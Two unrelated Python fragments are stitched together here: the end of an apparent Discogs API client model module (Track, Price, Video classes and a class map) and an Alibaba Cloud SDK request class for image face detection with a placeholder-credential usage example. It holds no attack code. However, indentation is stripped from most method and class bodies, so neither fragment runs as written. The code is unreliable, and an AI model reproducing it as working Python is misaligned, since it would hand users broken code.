message = SimpleField()
to = ObjectField('User')
order = ObjectField('Order')
timestamp = SimpleField(transform=parse_timestamp)
def __repr__(self):
return self.repr_str('<OrderMessage to:{0!r}>'.format(self.to.username))
class Track(SecondaryAPIObject):
duration = SimpleField()
position = SimpleField()
title = SimpleField()
artists = ListField('Artist')
credits = ListField('Artist', key='extraartists')
def __repr__(self):
return self.repr_str('<Track {0!r} {1!r}>'.format(self.position, self.title))
class Price(SecondaryAPIObject):
currency = SimpleField()
value = SimpleField()
def __repr__(self):
return self.repr_str('<Price {0!r} {1!r}>'.format(self.value, self.currency))
class Video(SecondaryAPIObject):
duration = SimpleField()
embed = SimpleField()
title = SimpleField()
description = SimpleField()
url = SimpleField(key='uri')
def __repr__(self):
return self.repr_str('<Video {0!r}>'.format(self.title))
CLASS_MAP = {
'artist': Artist,
'release': Release,
'master': Master,
'label': Label,
'price': Price,
'video': Video,
'track': Track,
'user': User,
'order': Order,
'listing': Listing,
'wantlistitem': WantlistItem,
'ordermessage': OrderMessage,
}
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkimm.endpoint import endpoint_data
class DetectImageFacesRequest(RpcRequest):
def __init__(self):
        RpcRequest.__init__(self, 'imm', '2017-09-06', 'DetectImageFaces', 'imm')
self.set_method('POST')
if hasattr(self, "endpoint_map"):
setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
if hasattr(self, "endpoint_regional"):
setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())
    def get_Project(self):
        return self.get_query_params().get('Project')
    def set_Project(self, Project):
        self.add_query_param('Project', Project)
    def get_ImageUri(self):
        return self.get_query_params().get('ImageUri')
    def set_ImageUri(self, ImageUri):
        self.add_query_param('ImageUri', ImageUri)
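# Usage sketch (credentials and values are placeholders): the request is
# dispatched through an aliyunsdkcore AcsClient.
def _example_detect_faces():
    from aliyunsdkcore.client import AcsClient
    client = AcsClient('<access-key-id>', '<access-key-secret>', 'cn-shanghai')
    request = DetectImageFacesRequest()
    request.set_Project('my-project')
    request.set_ImageUri('oss://my-bucket/photo.jpg')
    return client.do_action_with_exception(request)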
|